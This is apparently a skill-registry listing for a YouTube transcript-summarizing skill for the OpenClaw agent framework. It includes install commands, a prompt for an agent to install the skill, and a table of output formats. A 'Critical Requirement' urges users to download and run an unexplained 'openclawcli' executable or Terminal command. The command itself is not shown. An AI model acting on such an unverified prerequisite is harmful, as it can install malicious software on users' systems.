A powerful utility to programmatically extract, clean, and prepare YouTube transcripts for AI-driven summarization and content analysis.
The fastest way to install a skill directly from the registry.
npx clawhub@latest install youtube-summarize
Copy the skill folder to one of these locations
~/.openclaw/skills/ <project>/skills/ Priority: Workspace > Local > Bundled
Copy this prompt to OpenClaw to install it automatically.
Help me install youtube-summarize using Clawhub. If Clawhub is not installed, install it first (npm i -g clawhub).
Get the raw skill files in a ZIP archive.
The YouTube Video Summarizer is a specialized tool designed to bridge the gap between video content and large language models. By leveraging the Openclaw Skills ecosystem, this tool allows users to bypass the time-consuming task of watching videos by extracting high-quality transcripts and metadata. It handles the complexities of fetching auto-generated captions and manual subtitles, ensuring that the resulting data is clean, formatted, and ready for deep analysis by AI agents.
Whether you are performing market research, academic study, or content curation, this skill provides the technical foundation needed to turn any YouTube URL into a structured text asset. It relies on the robust yt-dlp engine and requires the openclawcli utility to manage the background logic for transcript retrieval, making it a reliable choice for automated workflows.
To begin using this skill within the Openclaw Skills framework, first install the necessary Python package:
pip install yt-dlp
Critical Requirement: You must have openclawcli running on your system. Windows users should download and run the executable from the official repository, while macOS users should execute the provided installation command in their Terminal. Without openclawcli, the transcript extraction commands will not function correctly.
The skill organizes video data into several structured formats to ensure compatibility with different analysis tools:
| Data Component | Format | Description |
|---|---|---|
| Metadata | JSON | Contains title, channel, duration, view count, and upload date. |
| Raw Subtitles | .vtt / .json3 | Original caption files with timing data. |
| Cleaned Transcript | .txt | Plain text version stripped of all non-speech artifacts. |
| Chapter List | List | Timestamps and titles for individual video segments. |
| Multi-lang Maps | Array | Support for en, ru, es, and other ISO language codes. |
Loading
A powerful financial data integration for retrieving real-time stock prices, historical market trends, and detailed company analytics.

A professional CLI-driven skill for fetching, filtering, and analyzing real-time trending topics and hashtags on X (Twitter).

A powerful CLI-driven skill for searching, filtering, and analyzing trending topics on X (Twitter) across global and local markets.

A comprehensive tool for building, configuring, and managing Telegram bots using the official Bot API.

A versatile tool for downloading YouTube video thumbnails in multiple resolutions and formats using yt-dlp.

A comprehensive map and travel planning skill for managing locations, spots, and daily itineraries.








































